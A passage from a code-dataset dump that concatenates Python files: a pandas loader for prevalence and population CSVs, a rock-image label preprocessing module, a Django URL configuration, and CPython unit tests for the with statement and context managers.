if len(location_code) == 2:
state_cd = location_code
df["zcta3"] = np.nan
else:
zcta3 = []
states = []
for loc in [l.strip() for l in location_code.split(",")]:
zcta3.append(loc[2:])
states.append(loc[:2])
df["zcta3"] = ",".join(zcta3)
states = list(set(states))
state_cd = ",".join(states)
state = us.states.lookup(state_cd)
df["state"] = state
            # read in age as output by pq
age = (
df[df["Order"] == 5]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# converting to list
df["age"] = age
df["filename"] = filename
year = (
df[df["Order"] == 12]["Weight Category"]
.str.extract(":(.*)", expand=True)
.reset_index()
.at[0, 0]
)
df["year"] = year
# add dataframe to list
all_df.append(df)
all_df = pd.concat(all_df, axis=0, ignore_index=True, sort=True)
all_data = all_df[all_df["Order"] == 1].drop(columns="Order")
std_data = all_data.drop(
columns=[
"Crude Prevalence",
"Weighted Prevalence",
"Age-Adjusted Prevalence",
"Sample",
"Population",
]
)
prev_data = all_data.drop(
columns=[
"Crude Prevalence Standard Error",
"Weighted Prevalence Standard Error",
"Age-Adjusted Prevalence Standard Error",
"Sample",
"Population",
]
)
prev_data_melt = prev_data.melt(
id_vars=[
"Weight Category",
"sex",
"race",
"state",
"zcta3",
"age",
"filename",
"year",
],
value_name="Prevalence",
var_name="Prevalence type",
)
std_melt = std_data.melt(
id_vars=[
"Weight Category",
"sex",
"race",
"state",
"zcta3",
"age",
"filename",
"year",
],
value_name="Standard Error",
var_name="Prevalence type",
)
prev_data_melt["Prevalence type"] = prev_data_melt["Prevalence type"].str.split(
expand=True
)[0]
std_melt["Prevalence type"] = std_melt["Prevalence type"].str.split(expand=True)[0]
output_name = prev_data_melt.merge(
std_melt,
on=[
"Weight Category",
"sex",
"race",
"state",
"zcta3",
"age",
"filename",
"year",
"Prevalence type",
],
how="left",
)
output_name["Prevalence"] = output_name["Prevalence"].replace({".": np.NAN})
output_name["Standard Error"] = output_name["Standard Error"].replace({".": np.NAN})
return output_name
def create_population_df(file_path, population_group):
"""creates a data frame that includes the population numbers and the demographic data.
Population numbers come from American Community Survey
Parameters:
file_path: A folder with pq outputs to compare
population_group: Type of population, expected inputs ['Pediatric', 'Adult']
Returns:
A DataFrame where the rows are distinct demographic and prevalence numbers."""
    # create a list of all the CSVs in the path
all_files = list(file_path.glob("**/*"))
    # define an empty list to build the df from
all_df = []
# import files
if population_group == "Pediatric":
for filename in all_files:
print(f"Reading {filename}")
# read in csv
# Adding error-catching loop with output note for debugging
try:
df = pd.read_csv(filename, index_col=None, header=0)
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
except Exception as e:
print(f"File {filename} has no data, skipping")
continue
            # read in sex as output by pq
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["sex"] = sex
            # read in race as output by pq
race = (
df[df["Order"] == 7]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["race"] = race
            # read in location code as output by pq
location_code = (
df[df["Order"] == 10]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# identify state
if len(location_code) == 2:
state_cd = location_code
df["zcta3"] = np.nan
else:
zcta3 = []
states = []
for loc in [l.strip() for l in location_code.split(",")]:
zcta3.append(loc[2:])
states.append(loc[:2])
df["zcta3"] = ",".join(zcta3)
states = list(set(states))
state_cd = ",".join(states)
state = us.states.lookup(state_cd)
df["state"] = state
            # read in age as output by pq
age = (
df[df["Order"] == 5]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# converting to list
df["age"] = age
df["filename"] = filename
year = (
df[df["Order"] == 11]["Weight Category"]
.str.extract(":(.*)", expand=True)
.reset_index()
.at[0, 0]
)
df["year"] = year
# add dataframe to list
all_df.append(df)
if population_group == "Adult":
for filename in all_files:
print(f"Reading {filename}")
# read in csv
# Adding error-catching loop with output note for debugging
try:
df = pd.read_csv(filename, index_col=None, header=0)
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
except Exception as e:
print(f"File {filename} has no data, skipping")
continue
            # read in sex as output by pq
sex = (
df[df["Order"] == 6]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["sex"] = sex
            # read in race as output by pq
race = (
df[df["Order"] == 8]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
df["race"] = race
            # read in location code as output by pq
location_code = (
df[df["Order"] == 11]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# identify state
if len(location_code) == 2:
state_cd = location_code
df["zcta3"] = np.nan
else:
zcta3 = []
states = []
for loc in [l.strip() for l in location_code.split(",")]:
zcta3.append(loc[2:])
states.append(loc[:2])
df["zcta3"] = ",".join(zcta3)
states = list(set(states))
state_cd = ",".join(states)
state = us.states.lookup(state_cd)
df["state"] = state
            # read in age as output by pq
age = (
df[df["Order"] == 5]["Weight Category"]
.str.extract("\(([^)]+)\)", expand=True)
.reset_index()
.at[0, 0]
)
# converting to list
df["age"] = age
df["filename"] = filename
year = (
df[df["Order"] == 12]["Weight Category"]
.str.extract(":(.*)", expand=True)
.reset_index()
.at[0, 0]
)
df["year"] = year
# add dataframe to list
all_df.append(df)
all_df = pd.concat(all_df, axis=0, ignore_index=True, sort=True)
all_data = all_df[all_df["Order"] == 1].drop(columns="Order")
pop_data = all_data.drop(
columns=[
"Crude Prevalence",
"Weighted Prevalence",
"Age-Adjusted Prevalence",
"Crude Prevalence Standard Error",
"Weighted Prevalence Standard Error",
"Age-Adjusted Prevalence Standard Error",
]
)
output_name = pop_data.melt(
id_vars=[
"Weight Category",
"sex",
"race",
"state",
"zcta3",
"age",
"filename",
"year",
],
value_name="Population",
var_name="Population type",
)
output_name["Population"] = output_name["Population"].replace({".": np.NAN})
output_name["Population"] = (
output_name["Population"].astype(str).str.replace(",", "").astype(float)
)
return output_name
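# --- Illustrative sketch (not part of the original module) ---
# Minimal use of the two loaders above; the results folder name and the
# population group value are hypothetical placeholders.
def _example_load(results_dir="pq_outputs"):
    prevalence = create_prevalence_df(Path(results_dir), "Pediatric")
    population = create_population_df(Path(results_dir), "Pediatric")
    return prevalence, population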
| 32.259494 | 90 | 0.444444 |
48546690bff0132eb5856b8f6eb44949c984db9f | 3,077 | py | Python | neural_rock/preprocess.py | LukasMosser/neural_rock_typing | 5bd0f4a621939032b442826d6ed52ed19db9b5a0 | ["Apache-2.0"] | 14 | 2021-05-16T23:21:16.000Z | 2021-11-25T12:49:56.000Z |
neural_rock/preprocess.py | LukasMosser/neural_rock_typing | 5bd0f4a621939032b442826d6ed52ed19db9b5a0 | ["Apache-2.0"] | 12 | 2021-05-18T20:57:12.000Z | 2021-12-26T18:10:20.000Z |
neural_rock/preprocess.py | LukasMosser/neural_rock_typing | 5bd0f4a621939032b442826d6ed52ed19db9b5a0 | ["Apache-2.0"] | 2 | 2021-05-17T09:20:56.000Z | 2021-10-03T09:06:51.000Z |
import pandas as pd
import os
from pathlib import Path
from typing import List
def get_leg194_data(df: pd.DataFrame) -> pd.DataFrame:
"""
Pandas pipe function to reduce only to Leg194 samples
"""
df = df.loc[df['Location'] == 'Leg194']
df = df.loc[df['Sample'].apply(lambda x: str(x).isdigit())]
df['Sample'] = df['Sample'].astype(int)
return df
def get_class_label_columns(df: pd.DataFrame) -> pd.DataFrame:
"""
Pandas pipe function to get only relevant data columns from data frame
"""
columns = ['Location', 'Sample', 'Dunham_class', 'Lucia_class', 'Macro_Dominant_type']
return df[columns]
def merge(df1: pd.DataFrame,
df2: pd.DataFrame) -> pd.DataFrame:
"""
Pandas pipe function to merge two dataframes
"""
df = df1.merge(df2, on=list(df1.columns), how='left')
return df
def drop_no_image(df: pd.DataFrame,
imaged_samples: List[int]) -> pd.DataFrame:
"""
Pandas pipe function to drop any rows from table for samples that have no images.
"""
df_temp = df[df['Sample'].isin(imaged_samples)]
return df_temp
def get_image_paths(base_path: Path = Path(".."),
rel_path: Path = Path("data/Images_PhD_Miami/Leg194/"),
imaging: str = "Xppl"):
"""
    Gets all the local image paths for the ROI and the imaged thin sections
"""
roi_ids = set([int(fname.split("_")[2].split("-")[0]) for fname in os.listdir(base_path.joinpath(rel_path, "ROI"))])
img_ids = []
img_paths = {}
for fname in os.listdir(base_path.joinpath(rel_path, "img")):
if fname.split(".")[1] == imaging:
sample_id = int(fname.split("-")[0].split("_")[1])
img_ids.append(sample_id)
img_paths[sample_id] = base_path.joinpath(rel_path, "img", fname)
img_ids = set(img_ids)
sample_ids = roi_ids.intersection(img_ids)
img_paths = {k: path for k, path in img_paths.items() if k in sample_ids}
roi_paths = {}
for fname in os.listdir(base_path.joinpath(rel_path, "ROI")):
sample_id = int(fname.split("_")[2].split("-")[0])
if sample_id in sample_ids:
roi_paths[sample_id] = base_path.joinpath(rel_path, "ROI", fname)
return sample_ids, img_paths, roi_paths
def load_label_dataframe(base_path: Path=Path("..")) -> pd.DataFrame:
"""
Data Preprocessing function to load the Leg194 dataset.
Uses pandas pipes to filter dataframe based on available images.
"""
sample_ids, image_paths, roi_paths = get_image_paths(base_path=base_path)
excel_path = base_path.joinpath("data/Data_Sheet_GDrive_new.xls")
df_dry = pd.read_excel(excel_path, sheet_name="Chaper_3_dry")
df_dry = df_dry.pipe(get_leg194_data).pipe(get_class_label_columns)
df_wet = pd.read_excel(excel_path, sheet_name="Chapter_3_water saturated")
df_wet = df_wet.pipe(get_leg194_data).pipe(get_class_label_columns)
df_label = df_wet.pipe(merge, df_dry)
df_imaged = df_label.pipe(drop_no_image, sample_ids)
return df_imaged
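# --- Illustrative sketch (not part of the original module) ---
# Minimal use of load_label_dataframe above, assuming the repository's
# expected data layout exists under base_path.
def _example_load_labels(base_path=Path("..")):
    df = load_label_dataframe(base_path=base_path)
    return df[["Sample", "Dunham_class", "Lucia_class", "Macro_Dominant_type"]]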
| 34.965909 | 120 | 0.662008 |
b8df2c01d8669aa4704bb98b728ecbf74b809add | 404 | py | Python | app/query/urls.py | scanner-research/esper-tv | 179ef57d536ebd52f93697aab09bf5abec19ce93 | ["Apache-2.0"] | 5 | 2019-04-17T01:01:46.000Z | 2021-07-11T01:32:50.000Z |
app/query/urls.py | DanFu09/esper | ccc5547de3637728b8aaab059b6781baebc269ec | ["Apache-2.0"] | 4 | 2019-11-12T08:35:03.000Z | 2021-06-10T20:37:04.000Z |
app/query/urls.py | DanFu09/esper | ccc5547de3637728b8aaab059b6781baebc269ec | ["Apache-2.0"] | 1 | 2020-09-01T01:15:44.000Z | 2020-09-01T01:15:44.000Z |
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^api/search', views.search, name='search'),
url(r'^api/schema', views.schema, name='schema'),
url(r'^api/subtitles', views.subtitles, name='subtitles'),
url(r'^api/labeled', views.labeled, name='labeled'),
url(r'^api/newthings', views.newthings, name='newthings'),
url(r'^', views.index, name='index')
]
| 33.666667 | 62 | 0.660891 |
66ff3b21f3bada9682ef670b8f80c6f550970fe2 | 26,156 | py | Python | Lib/test/test_with.py | ystk/debian-python3.1 | 6241444a6994140621d1b143a2d6b311b184366a | ["PSF-2.0"] | null | null | null |
Lib/test/test_with.py | ystk/debian-python3.1 | 6241444a6994140621d1b143a2d6b311b184366a | ["PSF-2.0"] | null | null | null |
Lib/test/test_with.py | ystk/debian-python3.1 | 6241444a6994140621d1b143a2d6b311b184366a | ["PSF-2.0"] | null | null | null |
#!/usr/bin/env python
"""Unit tests for the with statement specified in PEP 343."""
__author__ = "Mike Bland"
__email__ = "mbland at acm dot org"
import sys
import unittest
from collections import deque
from contextlib import GeneratorContextManager, contextmanager
from test.support import run_unittest
class MockContextManager(GeneratorContextManager):
def __init__(self, gen):
GeneratorContextManager.__init__(self, gen)
self.enter_called = False
self.exit_called = False
self.exit_args = None
def __enter__(self):
self.enter_called = True
return GeneratorContextManager.__enter__(self)
def __exit__(self, type, value, traceback):
self.exit_called = True
self.exit_args = (type, value, traceback)
return GeneratorContextManager.__exit__(self, type,
value, traceback)
def mock_contextmanager(func):
def helper(*args, **kwds):
return MockContextManager(func(*args, **kwds))
return helper
class MockResource(object):
def __init__(self):
self.yielded = False
self.stopped = False
@mock_contextmanager
def mock_contextmanager_generator():
mock = MockResource()
try:
mock.yielded = True
yield mock
finally:
mock.stopped = True
class Nested(object):
def __init__(self, *managers):
self.managers = managers
self.entered = None
def __enter__(self):
if self.entered is not None:
raise RuntimeError("Context is not reentrant")
self.entered = deque()
vars = []
try:
for mgr in self.managers:
vars.append(mgr.__enter__())
self.entered.appendleft(mgr)
except:
if not self.__exit__(*sys.exc_info()):
raise
return vars
def __exit__(self, *exc_info):
# Behave like nested with statements
# first in, last out
# New exceptions override old ones
ex = exc_info
for mgr in self.entered:
try:
if mgr.__exit__(*ex):
ex = (None, None, None)
except:
ex = sys.exc_info()
self.entered = None
if ex is not exc_info:
raise ex[0](ex[1]).with_traceback(ex[2])
class MockNested(Nested):
def __init__(self, *managers):
Nested.__init__(self, *managers)
self.enter_called = False
self.exit_called = False
self.exit_args = None
def __enter__(self):
self.enter_called = True
return Nested.__enter__(self)
def __exit__(self, *exc_info):
self.exit_called = True
self.exit_args = exc_info
return Nested.__exit__(self, *exc_info)
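# A minimal sketch of the "first in, last out" behaviour documented in
# Nested.__exit__ above, using two throwaway recorder managers; it is only
# illustrative and is not wired into the test suite below.
def _nested_order_demo():
    events = []

    class Recorder(object):
        def __init__(self, name):
            self.name = name
        def __enter__(self):
            events.append("enter " + self.name)
            return self.name
        def __exit__(self, *exc_info):
            events.append("exit " + self.name)

    with Nested(Recorder("a"), Recorder("b")) as (a, b):
        events.append("body %s %s" % (a, b))
    # events is now: enter a, enter b, body a b, exit b, exit a
    return events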
class FailureTestCase(unittest.TestCase):
def testNameError(self):
def fooNotDeclared():
with foo: pass
self.assertRaises(NameError, fooNotDeclared)
def testEnterAttributeError(self):
class LacksEnter(object):
def __exit__(self, type, value, traceback):
pass
def fooLacksEnter():
foo = LacksEnter()
with foo: pass
self.assertRaises(AttributeError, fooLacksEnter)
def testExitAttributeError(self):
class LacksExit(object):
def __enter__(self):
pass
def fooLacksExit():
foo = LacksExit()
with foo: pass
self.assertRaises(AttributeError, fooLacksExit)
def assertRaisesSyntaxError(self, codestr):
def shouldRaiseSyntaxError(s):
compile(s, '', 'single')
self.assertRaises(SyntaxError, shouldRaiseSyntaxError, codestr)
def testAssignmentToNoneError(self):
self.assertRaisesSyntaxError('with mock as None:\n pass')
self.assertRaisesSyntaxError(
'with mock as (None):\n'
' pass')
def testAssignmentToEmptyTupleError(self):
self.assertRaisesSyntaxError(
'with mock as ():\n'
' pass')
def testAssignmentToTupleOnlyContainingNoneError(self):
self.assertRaisesSyntaxError('with mock as None,:\n pass')
self.assertRaisesSyntaxError(
'with mock as (None,):\n'
' pass')
def testAssignmentToTupleContainingNoneError(self):
self.assertRaisesSyntaxError(
'with mock as (foo, None, bar):\n'
' pass')
def testEnterThrows(self):
class EnterThrows(object):
def __enter__(self):
raise RuntimeError("Enter threw")
def __exit__(self, *args):
pass
def shouldThrow():
ct = EnterThrows()
self.foo = None
with ct as self.foo:
pass
self.assertRaises(RuntimeError, shouldThrow)
self.assertEqual(self.foo, None)
def testExitThrows(self):
class ExitThrows(object):
def __enter__(self):
return
def __exit__(self, *args):
raise RuntimeError(42)
def shouldThrow():
with ExitThrows():
pass
self.assertRaises(RuntimeError, shouldThrow)
class ContextmanagerAssertionMixin(object):
def setUp(self):
self.TEST_EXCEPTION = RuntimeError("test exception")
def assertInWithManagerInvariants(self, mock_manager):
self.assertTrue(mock_manager.enter_called)
self.assertFalse(mock_manager.exit_called)
self.assertEqual(mock_manager.exit_args, None)
def assertAfterWithManagerInvariants(self, mock_manager, exit_args):
self.assertTrue(mock_manager.enter_called)
self.assertTrue(mock_manager.exit_called)
self.assertEqual(mock_manager.exit_args, exit_args)
def assertAfterWithManagerInvariantsNoError(self, mock_manager):
self.assertAfterWithManagerInvariants(mock_manager,
(None, None, None))
def assertInWithGeneratorInvariants(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertFalse(mock_generator.stopped)
def assertAfterWithGeneratorInvariantsNoError(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertTrue(mock_generator.stopped)
def raiseTestException(self):
raise self.TEST_EXCEPTION
def assertAfterWithManagerInvariantsWithError(self, mock_manager):
self.assertTrue(mock_manager.enter_called)
self.assertTrue(mock_manager.exit_called)
self.assertEqual(mock_manager.exit_args[0], RuntimeError)
self.assertEqual(mock_manager.exit_args[1], self.TEST_EXCEPTION)
def assertAfterWithGeneratorInvariantsWithError(self, mock_generator):
self.assertTrue(mock_generator.yielded)
self.assertTrue(mock_generator.stopped)
class NonexceptionalTestCase(unittest.TestCase, ContextmanagerAssertionMixin):
def testInlineGeneratorSyntax(self):
with mock_contextmanager_generator():
pass
def testUnboundGenerator(self):
mock = mock_contextmanager_generator()
with mock:
pass
self.assertAfterWithManagerInvariantsNoError(mock)
def testInlineGeneratorBoundSyntax(self):
with mock_contextmanager_generator() as foo:
self.assertInWithGeneratorInvariants(foo)
# FIXME: In the future, we'll try to keep the bound names from leaking
self.assertAfterWithGeneratorInvariantsNoError(foo)
def testInlineGeneratorBoundToExistingVariable(self):
foo = None
with mock_contextmanager_generator() as foo:
self.assertInWithGeneratorInvariants(foo)
self.assertAfterWithGeneratorInvariantsNoError(foo)
def testInlineGeneratorBoundToDottedVariable(self):
with mock_contextmanager_generator() as self.foo:
self.assertInWithGeneratorInvariants(self.foo)
self.assertAfterWithGeneratorInvariantsNoError(self.foo)
def testBoundGenerator(self):
mock = mock_contextmanager_generator()
with mock as foo:
self.assertInWithGeneratorInvariants(foo)
self.assertInWithManagerInvariants(mock)
self.assertAfterWithGeneratorInvariantsNoError(foo)
self.assertAfterWithManagerInvariantsNoError(mock)
def testNestedSingleStatements(self):
mock_a = mock_contextmanager_generator()
with mock_a as foo:
mock_b = mock_contextmanager_generator()
with mock_b as bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(foo)
self.assertInWithGeneratorInvariants(bar)
self.assertAfterWithManagerInvariantsNoError(mock_b)
self.assertAfterWithGeneratorInvariantsNoError(bar)
self.assertInWithManagerInvariants(mock_a)
self.assertInWithGeneratorInvariants(foo)
self.assertAfterWithManagerInvariantsNoError(mock_a)
self.assertAfterWithGeneratorInvariantsNoError(foo)
class NestedNonexceptionalTestCase(unittest.TestCase,
ContextmanagerAssertionMixin):
def testSingleArgInlineGeneratorSyntax(self):
with Nested(mock_contextmanager_generator()):
pass
def testSingleArgUnbound(self):
mock_contextmanager = mock_contextmanager_generator()
mock_nested = MockNested(mock_contextmanager)
with mock_nested:
self.assertInWithManagerInvariants(mock_contextmanager)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithManagerInvariantsNoError(mock_contextmanager)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
def testSingleArgBoundToNonTuple(self):
m = mock_contextmanager_generator()
# This will bind all the arguments to nested() into a single list
# assigned to foo.
with Nested(m) as foo:
self.assertInWithManagerInvariants(m)
self.assertAfterWithManagerInvariantsNoError(m)
def testSingleArgBoundToSingleElementParenthesizedList(self):
m = mock_contextmanager_generator()
# This will bind all the arguments to nested() into a single list
# assigned to foo.
with Nested(m) as (foo):
self.assertInWithManagerInvariants(m)
self.assertAfterWithManagerInvariantsNoError(m)
def testSingleArgBoundToMultipleElementTupleError(self):
def shouldThrowValueError():
with Nested(mock_contextmanager_generator()) as (foo, bar):
pass
self.assertRaises(ValueError, shouldThrowValueError)
def testMultipleArgUnbound(self):
m = mock_contextmanager_generator()
n = mock_contextmanager_generator()
o = mock_contextmanager_generator()
mock_nested = MockNested(m, n, o)
with mock_nested:
self.assertInWithManagerInvariants(m)
self.assertInWithManagerInvariants(n)
self.assertInWithManagerInvariants(o)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithManagerInvariantsNoError(m)
self.assertAfterWithManagerInvariantsNoError(n)
self.assertAfterWithManagerInvariantsNoError(o)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
def testMultipleArgBound(self):
mock_nested = MockNested(mock_contextmanager_generator(),
mock_contextmanager_generator(), mock_contextmanager_generator())
with mock_nested as (m, n, o):
self.assertInWithGeneratorInvariants(m)
self.assertInWithGeneratorInvariants(n)
self.assertInWithGeneratorInvariants(o)
self.assertInWithManagerInvariants(mock_nested)
self.assertAfterWithGeneratorInvariantsNoError(m)
self.assertAfterWithGeneratorInvariantsNoError(n)
self.assertAfterWithGeneratorInvariantsNoError(o)
self.assertAfterWithManagerInvariantsNoError(mock_nested)
class ExceptionalTestCase(ContextmanagerAssertionMixin, unittest.TestCase):
def testSingleResource(self):
cm = mock_contextmanager_generator()
def shouldThrow():
with cm as self.resource:
self.assertInWithManagerInvariants(cm)
self.assertInWithGeneratorInvariants(self.resource)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(cm)
self.assertAfterWithGeneratorInvariantsWithError(self.resource)
def testNestedSingleStatements(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
def shouldThrow():
with mock_a as self.foo:
with mock_b as self.bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(self.foo)
self.assertInWithGeneratorInvariants(self.bar)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithManagerInvariantsWithError(mock_b)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
self.assertAfterWithGeneratorInvariantsWithError(self.bar)
def testMultipleResourcesInSingleStatement(self):
cm_a = mock_contextmanager_generator()
cm_b = mock_contextmanager_generator()
mock_nested = MockNested(cm_a, cm_b)
def shouldThrow():
with mock_nested as (self.resource_a, self.resource_b):
self.assertInWithManagerInvariants(cm_a)
self.assertInWithManagerInvariants(cm_b)
self.assertInWithManagerInvariants(mock_nested)
self.assertInWithGeneratorInvariants(self.resource_a)
self.assertInWithGeneratorInvariants(self.resource_b)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(cm_a)
self.assertAfterWithManagerInvariantsWithError(cm_b)
self.assertAfterWithManagerInvariantsWithError(mock_nested)
self.assertAfterWithGeneratorInvariantsWithError(self.resource_a)
self.assertAfterWithGeneratorInvariantsWithError(self.resource_b)
def testNestedExceptionBeforeInnerStatement(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
self.bar = None
def shouldThrow():
with mock_a as self.foo:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithGeneratorInvariants(self.foo)
self.raiseTestException()
with mock_b as self.bar:
pass
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
# The inner statement stuff should never have been touched
self.assertEqual(self.bar, None)
self.assertFalse(mock_b.enter_called)
self.assertFalse(mock_b.exit_called)
self.assertEqual(mock_b.exit_args, None)
def testNestedExceptionAfterInnerStatement(self):
mock_a = mock_contextmanager_generator()
mock_b = mock_contextmanager_generator()
def shouldThrow():
with mock_a as self.foo:
with mock_b as self.bar:
self.assertInWithManagerInvariants(mock_a)
self.assertInWithManagerInvariants(mock_b)
self.assertInWithGeneratorInvariants(self.foo)
self.assertInWithGeneratorInvariants(self.bar)
self.raiseTestException()
self.assertRaises(RuntimeError, shouldThrow)
self.assertAfterWithManagerInvariantsWithError(mock_a)
self.assertAfterWithManagerInvariantsNoError(mock_b)
self.assertAfterWithGeneratorInvariantsWithError(self.foo)
self.assertAfterWithGeneratorInvariantsNoError(self.bar)
def testRaisedStopIteration1(self):
# From bug 1462485
@contextmanager
def cm():
yield
def shouldThrow():
with cm():
raise StopIteration("from with")
self.assertRaises(StopIteration, shouldThrow)
def testRaisedStopIteration2(self):
# From bug 1462485
class cm(object):
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def shouldThrow():
with cm():
raise StopIteration("from with")
self.assertRaises(StopIteration, shouldThrow)
def testRaisedStopIteration3(self):
# Another variant where the exception hasn't been instantiated
# From bug 1705170
@contextmanager
def cm():
yield
def shouldThrow():
with cm():
raise next(iter([]))
self.assertRaises(StopIteration, shouldThrow)
def testRaisedGeneratorExit1(self):
# From bug 1462485
@contextmanager
def cm():
yield
def shouldThrow():
with cm():
raise GeneratorExit("from with")
self.assertRaises(GeneratorExit, shouldThrow)
def testRaisedGeneratorExit2(self):
# From bug 1462485
class cm (object):
def __enter__(self):
pass
def __exit__(self, type, value, traceback):
pass
def shouldThrow():
with cm():
raise GeneratorExit("from with")
self.assertRaises(GeneratorExit, shouldThrow)
def testErrorsInBool(self):
# issue4589: __exit__ return code may raise an exception
# when looking at its truth value.
class cm(object):
def __init__(self, bool_conversion):
class Bool:
def __bool__(self):
return bool_conversion()
self.exit_result = Bool()
def __enter__(self):
return 3
def __exit__(self, a, b, c):
return self.exit_result
def trueAsBool():
with cm(lambda: True):
self.fail("Should NOT see this")
trueAsBool()
def falseAsBool():
with cm(lambda: False):
self.fail("Should raise")
self.assertRaises(AssertionError, falseAsBool)
def failAsBool():
with cm(lambda: 1//0):
self.fail("Should NOT see this")
self.assertRaises(ZeroDivisionError, failAsBool)
class NonLocalFlowControlTestCase(unittest.TestCase):
def testWithBreak(self):
counter = 0
while True:
counter += 1
with mock_contextmanager_generator():
counter += 10
break
counter += 100 # Not reached
self.assertEqual(counter, 11)
def testWithContinue(self):
counter = 0
while True:
counter += 1
if counter > 2:
break
with mock_contextmanager_generator():
counter += 10
continue
counter += 100 # Not reached
self.assertEqual(counter, 12)
def testWithReturn(self):
def foo():
counter = 0
while True:
counter += 1
with mock_contextmanager_generator():
counter += 10
return counter
counter += 100 # Not reached
self.assertEqual(foo(), 11)
def testWithYield(self):
def gen():
with mock_contextmanager_generator():
yield 12
yield 13
x = list(gen())
self.assertEqual(x, [12, 13])
def testWithRaise(self):
counter = 0
try:
counter += 1
with mock_contextmanager_generator():
counter += 10
raise RuntimeError
counter += 100 # Not reached
except RuntimeError:
self.assertEqual(counter, 11)
else:
self.fail("Didn't raise RuntimeError")
class AssignmentTargetTestCase(unittest.TestCase):
def testSingleComplexTarget(self):
targets = {1: [0, 1, 2]}
with mock_contextmanager_generator() as targets[1][0]:
self.assertEqual(list(targets.keys()), [1])
self.assertEqual(targets[1][0].__class__, MockResource)
with mock_contextmanager_generator() as list(targets.values())[0][1]:
self.assertEqual(list(targets.keys()), [1])
self.assertEqual(targets[1][1].__class__, MockResource)
with mock_contextmanager_generator() as targets[2]:
keys = list(targets.keys())
keys.sort()
self.assertEqual(keys, [1, 2])
class C: pass
blah = C()
with mock_contextmanager_generator() as blah.foo:
self.assertEqual(hasattr(blah, "foo"), True)
def testMultipleComplexTargets(self):
class C:
def __enter__(self): return 1, 2, 3
def __exit__(self, t, v, tb): pass
targets = {1: [0, 1, 2]}
with C() as (targets[1][0], targets[1][1], targets[1][2]):
self.assertEqual(targets, {1: [1, 2, 3]})
with C() as (list(targets.values())[0][2], list(targets.values())[0][1], list(targets.values())[0][0]):
self.assertEqual(targets, {1: [3, 2, 1]})
with C() as (targets[1], targets[2], targets[3]):
self.assertEqual(targets, {1: 1, 2: 2, 3: 3})
class B: pass
blah = B()
with C() as (blah.one, blah.two, blah.three):
self.assertEqual(blah.one, 1)
self.assertEqual(blah.two, 2)
self.assertEqual(blah.three, 3)
class ExitSwallowsExceptionTestCase(unittest.TestCase):
def testExitTrueSwallowsException(self):
class AfricanSwallow:
def __enter__(self): pass
def __exit__(self, t, v, tb): return True
try:
with AfricanSwallow():
1/0
except ZeroDivisionError:
self.fail("ZeroDivisionError should have been swallowed")
def testExitFalseDoesntSwallowException(self):
class EuropeanSwallow:
def __enter__(self): pass
def __exit__(self, t, v, tb): return False
try:
with EuropeanSwallow():
1/0
except ZeroDivisionError:
pass
else:
self.fail("ZeroDivisionError should have been raised")
class NestedWith(unittest.TestCase):
class Dummy(object):
def __init__(self, value=None, gobble=False):
if value is None:
value = self
self.value = value
self.gobble = gobble
self.enter_called = False
self.exit_called = False
def __enter__(self):
self.enter_called = True
return self.value
def __exit__(self, *exc_info):
self.exit_called = True
self.exc_info = exc_info
if self.gobble:
return True
class InitRaises(object):
def __init__(self): raise RuntimeError()
class EnterRaises(object):
def __enter__(self): raise RuntimeError()
def __exit__(self, *exc_info): pass
class ExitRaises(object):
def __enter__(self): pass
def __exit__(self, *exc_info): raise RuntimeError()
def testNoExceptions(self):
with self.Dummy() as a, self.Dummy() as b:
self.assertTrue(a.enter_called)
self.assertTrue(b.enter_called)
self.assertTrue(a.exit_called)
self.assertTrue(b.exit_called)
def testExceptionInExprList(self):
try:
with self.Dummy() as a, self.InitRaises():
pass
except:
pass
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
def testExceptionInEnter(self):
try:
with self.Dummy() as a, self.EnterRaises():
self.fail('body of bad with executed')
except RuntimeError:
pass
else:
self.fail('RuntimeError not reraised')
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
def testExceptionInExit(self):
body_executed = False
with self.Dummy(gobble=True) as a, self.ExitRaises():
body_executed = True
self.assertTrue(a.enter_called)
self.assertTrue(a.exit_called)
self.assertNotEqual(a.exc_info[0], None)
def testEnterReturnsTuple(self):
